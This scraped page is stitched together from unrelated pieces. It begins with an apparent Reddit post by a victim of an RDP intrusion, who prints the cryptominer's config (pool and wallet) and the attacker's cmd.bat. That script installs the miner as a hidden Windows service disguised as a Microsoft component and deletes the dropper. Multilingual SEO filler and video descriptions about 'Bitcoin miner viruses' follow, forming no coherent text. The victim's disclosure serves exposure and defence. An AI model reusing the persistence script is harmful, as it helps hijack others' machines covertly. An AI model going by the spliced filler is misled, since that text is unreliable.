How to remove a Trojan.BitCoinMiner Miner Infection

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

Unedited: BitCoin mining Virus/Malware found, explained. Remove bitcoin miner trojan Virus (Virus Removal Guide ... BEWARE THE BITCOIN VIRUS! (Bitcoin Trojan Provention) Vírus minerando bitcoins no meu computador! How to Remove BitcoinMiner

La actividad maliciosa del virus se compone de ejecutar múltiples scripts maliciosos en la PC infectada por una puerta trasera que el Virus Bitcoin Miner ejecuta de antemano. Estos scripts tienen el propósito de conectar el virus a un servidor de control y mando. Si el virus de minería usa diferentes clases para ejecutar más scripts que permiten que se lleven a cabo varias acciones: Riskware.Miner Symptoms of a Trojan.BitCoinMiner Infection As Trojan.BitCoinMiner's do not display a window and silently run in the background, many people do not even know that they are infected. Eine Krypto-Miner-Malware befällt Ihren PC oder andere Geräte wie ein gewöhnlicher Virus, beginnt dann aber damit, Ihr Gerät zum Berechnen einer digitalen Währung zu nutzen. Um etwa Bitcoins ... Der CoinMiner-Virus missbraucht die Rechenleistung Ihres Computers, damit der Inhaber des Virus Geld mit aufwendigen Berechnungen verdient. Wie das Prinzip des BitCoin Mining genau funktioniert, erfahren Sie in diesem Praxistipp. Laden Sie sich das kostenlose Programm Malwarebytes Anti-Malware bei CHIP herunter und installieren Sie es. Hierbei handelt es sich um einen äußerst zuverlässigen ... Che cos'è Bitcoin Miner Virus? Mentre gli attacchi ransomware diventano più frequenti che mai, rendendo il prezzo Bitcoin a salire, la necessità di un Virus del minatore Bitcoin aumenta anche. attori malware cercano di attuare un virus mineraria Bitcoin in tutto quello che fanno, che si tratti di backdoor, virus, ransomware, adware e redirect.

[index] [46353] [31593] [38636] [36541] [22381] [28288] [21894] [50346] [921] [7745]

Unedited: BitCoin mining Virus/Malware found, explained.

BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of this... What It Was Like MINING Cryptocurrency Full-Time For A Year Tails Health Update VoskCoin Rebrand - Duration: 23:44. VoskCoin Recommended for you Olá! Notei uma lentidão no computador, provocada por um vírus que estava minerando Bitcoins no meu computador. Nesse vídeo você acompanha como resolvi o problema. Produção e Edição: Eu ... There's a horrible bitcoin mining virus spreading through Russia. This Russian Bitcoin Virus is stealing credit card info. Putin Adviser on bitcoin ransomeware : “In regions with lower bandwidth ... This video is simply some unedited footage that I was preparing to show how malware that masquerades as a Realtek Audio Driver sits and uses system resources to mine Bitcoin for the malware author.

#